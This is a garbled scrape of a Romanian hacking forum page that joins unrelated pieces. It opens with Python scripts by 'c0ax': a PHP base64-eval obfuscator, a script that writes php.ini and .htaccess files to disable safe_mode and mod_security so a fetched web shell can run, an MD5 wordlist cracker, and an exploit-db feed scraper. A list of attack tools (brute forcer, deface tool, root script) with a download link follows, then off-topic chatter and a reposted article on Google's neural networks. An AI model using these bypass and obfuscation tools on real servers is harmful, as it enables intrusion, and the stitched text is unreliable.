ucitan.replace("<?php", "") if "<?" in ucitan: ucitan = ucitan.replace("<?", "") ucitan = ucitan.replace("?>", "") except: pass pocetak = "<?php\neval(base64_decode('" enkod = base64.b64encode(ucitan) kraj = "'));\n?>" try: ispiskod = open(ispis, "w") ispiskod.write(pocetak + enkod + kraj) ispiskod = ispiskod.close() print "Script in file %s is encoded. Check %s file for encoded code." % (fajl, ispis) print "Visit ljuska.org and c0axe.blogspot.com" print "Exiting..." time.sleep(2) sys.exit() except: print "Making output %s file failed." % fajl print "Visit ljuska.org and c0axe.blogspot.com" print "Exiting..." time.sleep(2) sys.exit() #EOF. Good luck. PySBypasser This script should bypass Safe Mod or disable functions or Mod Security. You need to create folder with 777 permision and then wget your shell ther and run script. #Safe Mode, Disabled Functions and Mod Security Bypass Script by c0ax #Greetz svim mojim prijateljima, oni znaju ko su. #Usage: python bypass.py [options] #Options are: -s or -m #Option -s is for Safe mod and disabled functions bypass #Option -m is for mod security bypass import sys, os from os import * #======= Options ========# if len(sys.argv) != 2: print """#Usage: python bypass.py [options] #Options are: -s or -m #Option -s is for Safe mod and disabled functions bypass #Option -m is for mod security bypass""" opcija = sys.argv[1] #========== Safe Mode and Disbled Functions ==========# file = "php.ini" svenaoff = "safe_mode = OFF\nsafe_mode_gid = OFF\nopen_basedir = OFF\nmagic_quotes_gpc = Off \nmagic_quotes_runtime = Off\nmagic_quotes_sybase = Off"" #========= Mod Security =========# htacc = ".htaccess" modsec = """<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>""" #========= 1st. Loop =======# def safemodandfunc(): if not os.path.islink(file): try: fajl = open(file, "w+") fajl.write(svenaoff) fajl.close() print "File %s successfull created..." % file print "Safe Mod and Disabled functions should be bypassed..." print "Visit ljuska.org and c0axe.blogspot.com" except: print "Creating fille failed." print "Visit ljuska.org and c0axe.blogspot.com" pass else: print "File %s already exists..." % file print "Visit ljuska.org and c0axe.blogspot.com" #======== 2nd. Loop =======# def modsecb(): if not os.path.islink(htacc): try: fo = open(htacc, "w+") fo.write(modsec) fo.close() print "File %s successfull created." % htacc print "Visit ljuska.org and c0axe.blogspot.com" print "Exiting...\n" except: print "Creating file failed." print "Visit ljuska.org and c0axe.blogspot.com" print "Exiting...\n" pass else: print "File %s already exists." % htacc print "Visit ljuska.org and c0axe.blogspot.com" print "Exiting..." #======== Options checking loops =======# direk = '/script' perm = 'chmod 777 %s' % direk goin = 'cd %s' % direk if (os.name == 'posix'): os.mkdir(direk) os.system(perm) os.system(goin) time.sleep(2) if opcija == '-s': safemodandfunc() print "Go into dir %s and wget your shell, you should have bypassed safe mod and functions." % direk if opcija == '-m': modsecb() print "Go into dir %s and wget your shell, you should have bypassed mod_security." % direk else: print "Windows version of Python Super Bypasser is not finished yet." Simple md5 cracker #!/usr/bin/python #Script by c0ax aka Illusionist #01.07.2012 #Greetz to all my friends. #Usage: md5cracker.py |hash| |wordlist| import sys, md5, time if len(sys.argv) != 3: print "Read the usage..." time.sleep(2) sys.exit(1) passwd = sys.argv[1] list = sys.argv[2] try: file = open(list, "r") except: print "Check wordlist path if it exist...\n" time.sleep(2) sys.exit(1) file = file.readlines() print "\nNumber of words in file:", len(file) print "Cracking..." time.sleep(1) for words in file: hash = md5.new(words[:-1]) out = hash.hexdigest() if passwd == out: print "Password is: %s " % (words) text2leet #Text2leet #Script by c0ax #Greetz: Ljuska.org members #Usage: leet.py [FILENAME] import string, time, sys leet = string.maketrans('aAeEiIlLoOsStT', '44331111005577') lol = sys.argv[1] ## opening files ## fajl = open(lol, "r") fajl2 = open("leet.txt", "w+") ## For loop for translating/creating file ## for line in fajl: print "Writing leet file..." bil = line.translate(leet) fajl2.write(bil) fajl2.close print "Leet file created. Check out leet.txt for your leet text." print "Visit ljuska.org" #EOF. RSSFeed #!/usr/bin/python # @Ljuska.org and @Exploit-db Feed catcher ~ By c0ax #Greetz: Ljuska.org and Balkan-paradise.org memberz. import re, urllib ## URL's ## url = urllib.urlopen("http://ljuska.org/feed.php").readlines() url2 = urllib.urlopen("http://www.exploit-db.com/rss.xml").readlines() ## For 1 ## for line in url: match = "<title type=\"html\">" matc = "<id>" autor = "<author><name>" ## Ime topica ## if match in line: line = re.sub(" ","",line) line = re.sub("<title type=\"html\">","", line) line = re.sub("]]></title>","",line) line = line.replace("<![CDATA[", "") print "Ime Topica: ", line.rstrip() ## Link topica ## if matc in line: line = re.sub(" ","",line) line = re.sub("<id>","", line) line = re.sub("</id>","",line) print "Link Topica: " + line.rstrip() + "" ## Autor topica ## if autor in line: line = re.sub(" ","",line) line = re.sub("<author><name>","", line) line = re.sub("]></name></author>","",line) line = line.replace("<![CDATA", "") print "Autor Topica: " + line.rstrip() + "\n" ## For 2 ## for explline in url2: expmatch = "<title>" matce = "<link>" ## Ime exploita ## if expmatch in explline: explline = re.sub(" ","",explline) explline = re.sub("<title>","", explline) explline = re.sub("</title>","",explline) print "Ime Exploita: ", explline.rstrip() ## Link exploita ## if matce in explline: explline = re.sub(" ","",explline) explline = re.sub("<link>","", explline) explline = re.sub("</link>","",explline) print "Link Exploita: " + explline.rstrip() + "\n" #EOF. Script by c0ax. Visit Ljuska.org and Balkan-paradise.org nu m-a interesat nimic din ele vedeti voi ce si cum source: http://b4ltazar.us/

da ai dreptate, data e in carte

Hacking Exposed 7: Network Security Secrets & Solutions, Seventh Edition Stuart McClure, CNE, CCSE Joel Scambray, CISSP George Kurtz, CISSP, CISA Hacking Exposed 7 Network Security Secre - Stuart McClure

am: AKG PERCEPTION 200 îns? vreau sa trec la 400 mixer behringer xenyx 1832fx mixer behringer eurorack ub 1202 casti sennheiser hd 280 silver soft: Cakewalk.com - The World's Best Software For Recording And Making Music On PC And Mac Reason - Complete music making, music production and recording studio software - Propellerhead daca cunoasteti tutoriale sau trick-uri de master / finisare a vocii ar fi util sa postati thanks tromfil

ok.

era vorba de altceva, in fine, numai deschid nici un thread la off-topic, JUR.

nu e vorba de el, e vorba de aparatura

Stiri online, stiri de ultima ora | Stirileprotv.ro

dir /s > listing.txt 08.10.2012 03:03 1.712 AdminPageScanner.txt 08.10.2012 02:56 3.644 Anti-Syn.sh.txt 08.10.2012 02:38 10.985 CloudflareIPresolver.py 08.10.2012 03:00 53 DNSExtractor.txt 08.10.2012 02:40 3.358 EasySocks.pl 08.10.2012 02:58 9.943 HideMyAssproxygrabber.py.txt 08.10.2012 03:02 2.239 LanObserver.py.txt 08.10.2012 02:47 23.446 MSSExploiter.py.txt 08.10.2012 02:54 2.748 PersistantDefaceTool.sh.txt 08.10.2012 03:01 5.545 RapidshareACtester.py.txt 17.04.2012 17:58 2.953 rootdabitch.sh 08.10.2012 02:59 300 RWHashgenerator.txt 08.10.2012 02:50 490 SensitiveBuster.txt 08.10.2012 02:41 8.377 vBulletinBruteForcer.py.txt 14 File(s) 75.793 bytes download: http://r00tw0rm.com/back.zip mirror: Download back.zip

A powerful new approach to artificial intelligence is ready to improve many Google products. Platonic ideal: This composite image represents the ideal stimulus that Google’s neural network recognizes as a cat face. Credit: Google This summer Google set a new landmark in the field of artificial intelligence with software that learned how to recognize cats, people, and other things simply by watching YouTube videos (see "Self-Taught Software"). That technology, modeled on how brain cells operate, is now being put to work making Google's products smarter, with speech recognition being the first service to benefit. Google's learning software is based on simulating groups of connected brain cells that communicate and influence one another. When such a neural network, as it's called, is exposed to data, the relationships between different neurons can change. That causes the network to develop the ability to react in certain ways to incoming data of a particular kind—and the network is said to have learned something. Neural networks have been used for decades in areas where machine learning is applied, such as chess-playing software or face detection. Google's engineers have found ways to put more computing power behind the approach than was previously possible, creating neural networks that can learn without human assistance and are robust enough to be used commercially, not just as research demonstrations. The company's neural networks decide for themselves which features of data to pay attention to, and which patterns matter, rather than having humans decide that, say, colors and particular shapes are of interest to software trying to identify objects. Google is now using these neural networks to recognize speech more accurately, a technology increasingly important to Google's smartphone operating system, Android, as well as the search app it makes available for Apple devices (see "Google's Answer to Siri Thinks Ahead"). "We got between 20 and 25 percent improvement in terms of words that are wrong," says Vincent Vanhoucke, a leader of Google's speech-recognition efforts. "That means that many more people will have a perfect experience without errors." The neural net is so far only working on U.S. English, and Vanhoucke says similar improvements should be possible when it is introduced for other dialects and languages. Other Google products will likely improve over time with help from the new learning software. The company's image search tools, for example, could become better able to understand what's in a photo without relying on surrounding text. And Google's self-driving cars (see "Look, No Hands") and mobile computer built into a pair of glasses (see "You Will Want Google's Goggles") could benefit from software better able to make sense of more real-world data. The new technology grabbed headlines back in June of this year, when Google engineers published results of an experiment that threw 10 million images grabbed from YouTube videos at their simulated brain cells, running 16,000 processors across a thousand computers for 10 days without pause. Average features: This composite image represents the ideal stimulus for Google's software to detect a human face in a photo. Credit: Google "Most people keep their model in a single machine, but we wanted to experiment with very large neural networks," says Jeff Dean, an engineer helping lead the research at Google. "If you scale up both the size of the model and the amount of data you train it with, you can learn finer distinctions or more complex features." The neural networks that come out of that process are more flexible. "These models can typically take a lot more context," says Dean, giving an example from the world of speech recognition. If, for example, Google's system thought it heard someone say "I'm going to eat a lychee," but the last word was slightly muffled, it could confirm its hunch based on past experience of phrases because "lychee" is a fruit and is used in the same context as "apple" or "orange." Dean says his team is also testing models that understand both images and text together. "You give it 'porpoise' and it gives you pictures of porpoises," he says. "If you give it a picture of a porpoise, it gives you 'porpoise' as a word." A next step could be to have the same model learn the sounds of words as well. Being able to relate different forms of data like that could lead to speech recognition that gathers extra clues from video, for example, and it could boost the capabilities of Google's self-driving cars by helping them understand their surroundings by combining the many streams of data they collect, from laser scans of nearby obstacles to information from the car's engine. Google's work on making neural networks brings us a small step closer to one of the ultimate goals of AI—creating software that can match animal or perhaps even human intelligence, says Yoshua Bengio, a professor at the University of Montreal who works on similar machine-learning techniques. "This is the route toward making more general artificial intelligence—there's no way you will get an intelligent machine if it can't take in a large volume of knowledge about the world," he says. In fact, the workings of Google's neural networks operate in similar ways to what neuroscientists know about the visual cortex in mammals, the part of the brain that processes visual information, says Bengio. "It turns out that the feature learning networks being used [by Google] are similar to the methods used by the brain that are able to discover objects that exist." However, he is quick to add that even Google's neural networks are much smaller than the brain, and that they can't perform many things necessary to intelligence, such as reasoning with information collected from the outside world. Dean is also careful not to imply that the limited intelligences he's building are close to matching any biological brain. But he can't resist pointing out that if you pick the right contest, Google's neural networks have humans beat. "We are seeing better than human-level performance in some visual tasks," he says, giving the example of labeling, where house numbers appear in photos taken by Google's Street View car, a job that used to be farmed out to many humans. "They're starting to use neural nets to decide whether a patch [in an image] is a house number or not," says Dean, and they turn out to perform better than humans. It's a small victory—but one that highlights how far artificial neural nets are behind the ones in your head. "It's probably that it's not very exciting, and a computer never gets tired," says Dean. It takes real intelligence to get bored. via Google Puts Its Virtual Brain Technology to Work - Technology Review

repede ban